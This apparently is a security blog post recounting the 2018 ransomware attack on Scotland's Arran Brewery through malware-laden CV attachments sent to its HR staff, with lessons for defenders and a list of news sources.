Hey attackers, leave the (beer) alone! Arran Brewery Compromised
Unfortunately, ransomware is quite common as an attack vector across business. This is partially due to the delivery method being low impact, cost efficient, and easily done. This form of attack has the capability to provide for a large ROI (return on investment) when the attack is marginally effective. Any business with capital or data of value is a viable target.
One particular attack point not used significantly as it could have been is the Human Resources Department. The Human Resource Department staff expect dozens of resumes and documents daily from persons seeking positions with the business. The Human Resources staff are trained in human resource matters, and have not exactly been trained to watch for malware. The staff may open the documents without actually thinking about it. This, unfortunately for the business, may have unintended results.
There is a small brewery in Scotland. The brewery sells Arran Blonde and Arran Red Squirrel. The business is based on the Isle of Arran. Through the year the business has multiple job openings and accepts resumes and other documents from the various applicants.
As noted, the business was the victim of ransomware. The business termed this as a sophisticated attack. Most ransomware attacks are labelled as such when these may be a normal strain. As with ransomware, the target opened the email with the resume as the attachment. Reportedly with this incident, the ransomware was in the PDF. This ransomware was a variant of the Dharma ransomware. This functions to rename files with the .bip extension.
The Human Resource Department member would have had no idea of the ransomware. With the dozens of documents they would receive, it would have been difficult to discern which resume was the malware-ridden one. The attacker had the job posting placed in several other career sites to increase the number of resumes received. This should have been noted as a symptom of an issue when the business began to receive resumes from across the country and globe. This worked brilliantly to camouflage the email with malware among the large numbers received from various sources, which normally would not have been received.
This locked the brewery out of their system. This also worked to encrypt a portion of their back-ups. The decryption key ransom was two bitcoins. Arran Brewery declined to pay. The business lost three months of sales data from one server. They had been attempting to restore the data. In order to relatively ensure the malware was not present on the servers going forward, the business contracted with a consultant to purge this.
As you would expect, there was a rather significant disruption to the business. This includes, but was not limited to the lost sales data, the direct labor and overhead associated with the staff working on this issue, and also the contracted parties fees. This was not a cheap endeavor to remediate this. In a non-financial sense, the management lost partially their confidence in the cybersecurity system.
When the Human Resources staff member opened the malicious file, the staff member was just following the standard operating procedures with receiving the resumes, opening these, and reviewing the qualifications. Of the hundreds of resumes received, at least one made it through the malware filter and was opened. This shows the need for the blue (defensive) team to think more creatively to defeat those that would attack the system.
This also highlights the need for additional training to remove as much as possible the potential for ransomware in the enterprise.
BBC. (2018, September 20). Arran brewery hit by ransomware attack. Retrieved from https://www.bbc.com/uk-scotland-scotland-business-45587903
Burton, G. (2018, September 21). Arran brewery attacked with ransomware under cover recruitment-ad CV spam. Retrieved from https://www.computing.co.uk/ctg/news/3063224/arran-brewery-attacked-with-ransomware-under-cover-of-recruitment-ad-CV-spam
Dissent. (2018, September 21). UK: Arran brewery blackmailed by hackers as scottish beer firm becomes latest victim of sophisticated ransomware attack. Retrieved from https://www.databreaches.net.net/uk-arran-breery-blackmailed-b7-hackers-as-scottish-beer-firm-becomes-latest-victim-of-sophisticated-ransomware-attack/
French, P. (2018, September 21). Arran brewery victim of ‘very devious’ cyber attack. Retrieved from https://www.thedrinksbusiness.com/2018/09/arran-brewery-victim-of-very-devious-cyber-attack/
Leyden, J. (2018, September 21). Scottish brewery recovers from ransomware attack. Retrieved from https://www.theregister.co.uk/2018/09/21/arran_brewer_ransomware/
N., B. (2018, September 24). Arran brewery hits massive ransomware attack-Warned other companies to stay safe. Retrieved from https://gbhackers.com/arran-brewery/
Nexit. (2018, September 21). Scotland’s arran brewery slammed by dharma bip ransomware. Retrieved from https://www.next-it.net/scotlands-arran-brewery-slammed-by-dharma-bip-ransomware/
Olenick, D. (2018, September 21). Scottish brewery ransomware attack leverages job opening. Retrieved from https://www.scmagazine.com/home/news/scottish-brewery-ransomware-attack-leverages-job-opening/
Schwartz, M.J. (2018, September 21). Scotland’s arran brewery slammed by dharma bip ransomware. Retrieved from https://www.bankinfosecurity.com/scottish-brewery-slammed-by-dharma-ransomware-variant-a-11537
Smith. (2018, September 23). Brewery became victim of targeted ransomware attack via job vacancy ad. Retrieved from https://www.csoonline.com/article/3307193/security/brewery-became-victim-of-targeted-ransomware-attack-via-job-vacancy-ad.html
Sussman, B. (2018, September 21). Tear in my beer: Brewery hit by ransomware. Retrieved from https://www.secureworldexpo.com/industry-news/ransomware-hr-case
Whitelaw, J. (2018, September 20). ‘Pay up’ arran brewery blackmailed by hackers as scottish beer firm becomes latest victim of sophisticated ransomware attack. Retrieved from https://www.thescottishsun.co.uk/tech/3235218/arran-brewery-blackmailed-hackers-ransomware-attack/
About the Author - Charles Parker, II has been working in the info sec field for over a decade, performing pen tests, vulnerability assessments, consulting with small- to medium-sized businesses to mitigate and remediate their issues, and preparing IT and info sec policies and procedures. Mr. Parker’s background includes work in the banking, medical, automotive, and staffing industries.